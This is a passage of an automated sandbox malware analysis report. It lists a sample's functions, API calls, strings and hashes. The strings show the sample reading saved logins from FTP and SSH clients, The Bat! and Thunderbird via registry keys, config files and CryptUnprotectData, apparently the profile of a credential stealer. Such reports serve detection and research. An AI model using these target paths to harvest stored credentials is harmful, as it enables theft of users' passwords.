                  • GetPrivateProfileStringA.KERNEL32(Program,DataPath,00411805,?,00000104,00000000), ref: 0040E6B8
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E711
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocCloseEnumLocalOpenPrivateProfileString
                  • String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
                  • API String ID: 1343824468-2495907966
                  • Opcode ID: f7f0f3633f25f2bd9f0937b0f3f18dbeb2d7bad1331dcb419371d179e8ceaddf
                  • Instruction ID: 36dd7cfe40a76730b9bba45eaf33402ea87356010da727bd2c80388284970864
                  • Opcode Fuzzy Hash: f7f0f3633f25f2bd9f0937b0f3f18dbeb2d7bad1331dcb419371d179e8ceaddf
                  • Instruction Fuzzy Hash: DD31FA3190410CFADF116FA18C42FDD7AB9BF04704F1088BAB655750E1EBBA5A919B98
                  Function 0040601A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406030
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406064
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406272
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$Port$PthR$SSH$User
                  • API String ID: 1332880857-1643752846
                  • Opcode ID: 22d3199f6ffb7bd7c324d631388ededfce537ac4dd85ea99bb1351676a49edd8
                  • Instruction ID: 717bec1f817c6041e82a5bb1f673203c31f40167fb263f3afb6c8f705fbd8957
                  • Opcode Fuzzy Hash: 22d3199f6ffb7bd7c324d631388ededfce537ac4dd85ea99bb1351676a49edd8
                  • Instruction Fuzzy Hash: 8751C531940118EADF227B51CD42BD9BBB5BF04308F10C0BAB645750B1DBBA5AA1EF88
                  Function 00405B69 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00405B7F
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405BB3
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405D5F
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumFreeLocalOpen
                  • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                  • API String ID: 3369285772-3748300950
                  • Opcode ID: 861065ac100eef7e94bd919a254844cf1528a48578ae58a6f8f0bce791b71619
                  • Instruction ID: bd6511a607c152044000779701187701da5593353ec7af31bd24a4650797122f
                  • Opcode Fuzzy Hash: 861065ac100eef7e94bd919a254844cf1528a48578ae58a6f8f0bce791b71619
                  • Instruction Fuzzy Hash: 5041A431940118BADF227B51CD42BD9BBB9FF04308F10C0BAB245750B1DBBA5A91AF98
                  Function 00406D5E Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00406D71
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00406DA5
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00406F37
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Directory$Password$Server$UserName$_Password
                  • API String ID: 1332880857-3317168126
                  • Opcode ID: 0295d48f9159583e3bb3b4c81249b031f90fd7620fc95874c7d8aa04f99b4e09
                  • Instruction ID: 16d1b833b2ee5968848fc559eb8c09407504fd4541dfa60c1da0701f2eff17c4
                  • Opcode Fuzzy Hash: 0295d48f9159583e3bb3b4c81249b031f90fd7620fc95874c7d8aa04f99b4e09
                  • Instruction Fuzzy Hash: 6341953194011CBADF226F51CD42BDDBBB5BF04304F10C1BAB559750B2DBBA5AA1AF88
                  Function 0040D5DC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D5EF
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D623
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D7B7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: HostName$Password$PortNumber$TerminalType$UserName
                  • API String ID: 1332880857-1017491782
                  • Opcode ID: 36fac6972d13d9aaf5a0a37310bf3e32aab8aaddad991833400995bc47fd96b9
                  • Instruction ID: 80c3a7e6e8e16172fa092274a63f5f0f4b87c6c355c6ed336365e5d713e553db
                  • Opcode Fuzzy Hash: 36fac6972d13d9aaf5a0a37310bf3e32aab8aaddad991833400995bc47fd96b9
                  • Instruction Fuzzy Hash: 40419531840118FADF226F91CC42BDDBBB5BF04308F10C4BAB649751B1DB7A5AA59F88
                  Function 00406F89 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00406F9C
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00406FD0
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407162
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                  • API String ID: 1332880857-980612798
                  • Opcode ID: 675a1423b11df55a91f59a4ac948b29fe10135cf848136257ad25863e74e94f9
                  • Instruction ID: fac69ff356c5d9a3a700d045b1112cda43426525da53c38b63ceafff8f4ab98b
                  • Opcode Fuzzy Hash: 675a1423b11df55a91f59a4ac948b29fe10135cf848136257ad25863e74e94f9
                  • Instruction Fuzzy Hash: B541B63194011CBADF226F51CD42BDDBBB5BF04304F10C0BAB659791B1DBBA5AA19F88
                  Function 00405E01 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00405E17
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405E4B
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405FE0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: HostDirName$HostName$Password$Port$Username
                  • API String ID: 1332880857-791697221
                  • Opcode ID: 5f429ff3d63b552880f898da56513a68410768927777eac0ef42e1b95d242391
                  • Instruction ID: 02d2e0d06eb6aa5cd977bda184cad4249618897674006919e1422700d120f387
                  • Opcode Fuzzy Hash: 5f429ff3d63b552880f898da56513a68410768927777eac0ef42e1b95d242391
                  • Instruction Fuzzy Hash: A8418531940118BADF227B51DD42BDDBBB5FF04304F10C0BAB645750B1DBBA5AA1AF98
                  Function 0040D1A2 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D1B8
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D1EC
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D36F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$Pass$Port$Remote Dir$User
                  • API String ID: 1332880857-1775099961
                  • Opcode ID: 72010a422a528b3a6febdf38cc13342291fb876f8aca6c746118a020dd241374
                  • Instruction ID: 16c70e4eb59eb3fe7fd28d31a3833132b033dbea7dcbbf5d53e6c61d8458b25c
                  • Opcode Fuzzy Hash: 72010a422a528b3a6febdf38cc13342291fb876f8aca6c746118a020dd241374
                  • Instruction Fuzzy Hash: DC41D771840118BADF227F91CD42BDCBBB5BF04704F10C0BAB645750B2DB7A5A91AF98
                  Function 0040C405 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 101COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(007200D8,BlazeFtp), ref: 0040C42C
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                  • API String ID: 1884169789-2976447346
                  • Opcode ID: 45f9370da21ecbccc8b1bb17dd46baba8a71987c16784ecbe0b6d5142734595e
                  • Instruction ID: 087c8f14cc38ebf4340fa4c74bc8456b090ac4174222f55b5626d9778e4d167b
                  • Opcode Fuzzy Hash: 45f9370da21ecbccc8b1bb17dd46baba8a71987c16784ecbe0b6d5142734595e
                  • Instruction Fuzzy Hash: 4531F730940109BADF126FA1DC42BAE7F72AB40B45F10813AB615351F2D7B95B90EB8C
                  Function 00404FE0 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 69COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(007200D8,CUTEFTP), ref: 00405007
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  • CUTEFTP, xrefs: 00405001
                  • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405071
                  • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 004050A5
                  • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 00405098
                  • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 0040508B
                  • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405064
                  • \sm.dat, xrefs: 0040501B
                  • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 0040507E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
                  • API String ID: 1884169789-2738976122
                  • Opcode ID: 53a5ffd72eef3946d52d7a2c873d6d4d47f5f81c126ab374a59c1b1bfb5f9826
                  • Instruction ID: 40326283f0e2aaf7953628d4f5848c5de1a0b9c4e64ebf3f828c0269d9f17f80
                  • Opcode Fuzzy Hash: 53a5ffd72eef3946d52d7a2c873d6d4d47f5f81c126ab374a59c1b1bfb5f9826
                  • Instruction Fuzzy Hash: AB1121B0640109B9DF21BF21CD02FDE3E65AF51784F104136BA44B51F3C7BD8AA1969C
                  Function 00406931 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 121registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406947
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040697B
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B1C
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumFreeLocalOpen
                  • String ID: Hostname$Password$Port$Username
                  • API String ID: 3369285772-1811172798
                  • Opcode ID: 7748ef1c9e17dcbd72711a2d7625c610005a5d9d9387b89186d8fef29979e095
                  • Instruction ID: 24717ae2ce83b4fee808f0103274e04dd0bff139fda315af897242a983001c14
                  • Opcode Fuzzy Hash: 7748ef1c9e17dcbd72711a2d7625c610005a5d9d9387b89186d8fef29979e095
                  • Instruction Fuzzy Hash: B341C87194011CEADF21BB51CC42BD9BAB9BF04308F10C0BAB545750B1DFBA5AA19F98
                  Function 00406738 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 110registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040674E
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406782
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004068F7
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumFreeLocalOpen
                  • String ID: FtpPort$Password$Server$Username
                  • API String ID: 3369285772-1828875246
                  • Opcode ID: 33ababc615020c475aea93dc55798473f16b2b39c4eed30d71edd941c412992a
                  • Instruction ID: 2d861f8c944312f088572d5a7307ac687774c4b6fa6ec605e7997a0d99139e7a
                  • Opcode Fuzzy Hash: 33ababc615020c475aea93dc55798473f16b2b39c4eed30d71edd941c412992a
                  • Instruction Fuzzy Hash: 3041D931940118FADF217B51CD42BD97BB9BF04308F10C0BAB545750B1DBBA5AA5AF98
                  Function 0040DE19 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 97registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DE29
                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040DF59
                    • Part of subcall function 00403FF9: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404045
                    • Part of subcall function 00403FF9: LocalFree.KERNEL32(00000000), ref: 00404079
                    • Part of subcall function 00401548: lstrlen.KERNEL32(00000000), ref: 00401554
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
                  • String ID: Folder$Port$Site$UserID$xflags
                  • API String ID: 2167297517-269738940
                  • Opcode ID: b197340e990e52b368227ab337fb88699f86a103d108e5365677279b24fd79d5
                  • Instruction ID: a6a90b714e26ee6588c0913544ebb450cdb080e323798d6688fbffd92cab19fa
                  • Opcode Fuzzy Hash: b197340e990e52b368227ab337fb88699f86a103d108e5365677279b24fd79d5
                  • Instruction Fuzzy Hash: C5319335C5010ABBDF12AF91CC42AEEBB72BF04349F10843AB611751F1D77A9A64EB48
                  Function 004074AA Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004074BD
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004074F1
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040760C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: DataDir$InstallPath$sites.dat$sites.ini
                  • API String ID: 1332880857-3870687875
                  • Opcode ID: 7898ede5be31474b678268efb6e6f80c155cac00ced80efcf6e420b7494e70d9
                  • Instruction ID: d3284ad3f34496e62fd12d7fa9e0dcff96666478f7bf7f6fef37d7e2cb8aa850
                  • Opcode Fuzzy Hash: 7898ede5be31474b678268efb6e6f80c155cac00ced80efcf6e420b7494e70d9
                  • Instruction Fuzzy Hash: 5331F83190011CBADF21AF51CD02FDD7ABABF04304F10C4B6B545750A1DBBA6BA19F99
                  Function 0040F401 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F42F
                    • Part of subcall function 0040981E: StrStrIA.SHLWAPI(?,?), ref: 0040982A
                    • Part of subcall function 0040981E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 004098A1
                    • Part of subcall function 0040981E: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 004098CD
                    • Part of subcall function 0040981E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409915
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F474
                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F48F
                  • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F4D4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                  • API String ID: 3062143572-138716004
                  • Opcode ID: fb50987f158ec55cfe2bb98806428d2a930dfc83a1c3585cb17d9350d07b801a
                  • Instruction ID: 149315b3b7d40ce8fe94d34389e19c2d4a991ddf4f61bed643bfa2bff0e59c54
                  • Opcode Fuzzy Hash: fb50987f158ec55cfe2bb98806428d2a930dfc83a1c3585cb17d9350d07b801a
                  • Instruction Fuzzy Hash: A611D431240219BADB21BF52CD42FC93A69AB48B04F50C07AB704751E3DFF98ED09A98
                  Function 00407661 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 100stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(007200D8,unleap.exe), ref: 00407693
                  • lstrlen.KERNEL32(unleap.exe,00000001,007200D8,unleap.exe), ref: 004076AC
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  • StrStrIA.SHLWAPI(007203F8,leapftp,007200D8,unleap.exe), ref: 004076F0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
                  • API String ID: 1884169789-1497043051
                  • Opcode ID: af4d8a99ae7d6717864c20f85514df29d3cffccb4e66039880575eb1ac25d03b
                  • Instruction ID: ca438b8d423bcd58eb69d4cbe9981110522e53291ca9e45b99f12488e8eba69f
                  • Opcode Fuzzy Hash: af4d8a99ae7d6717864c20f85514df29d3cffccb4e66039880575eb1ac25d03b
                  • Instruction Fuzzy Hash: 2121C870A441047DEB213B31CD02FAE3E1ADF84794F244437B912B61E3D7BD6AA2929D
                  Function 0040EB4E Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 90COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  • wsprintfA.USER32 ref: 0040EC23
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocalwsprintf
                  • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                  • API String ID: 988369812-1921698578
                  • Opcode ID: 111e2f18cc080e312094e3f199f6637e13ef9141b0adfb92f192eb5c2020bf9f
                  • Instruction ID: b8460b7012a66b18e4ab8811a7bc871307c8c31403b4ecf2b79765d56f7371ef
                  • Opcode Fuzzy Hash: 111e2f18cc080e312094e3f199f6637e13ef9141b0adfb92f192eb5c2020bf9f
                  • Instruction Fuzzy Hash: C931E131A04108FADF11AF91DD42ADE7B75AB04714F204877F511751F1D7BA9B60AB48
                  Function 0040486E Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 148COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404898
                  Strings
                  Memory Dump Source
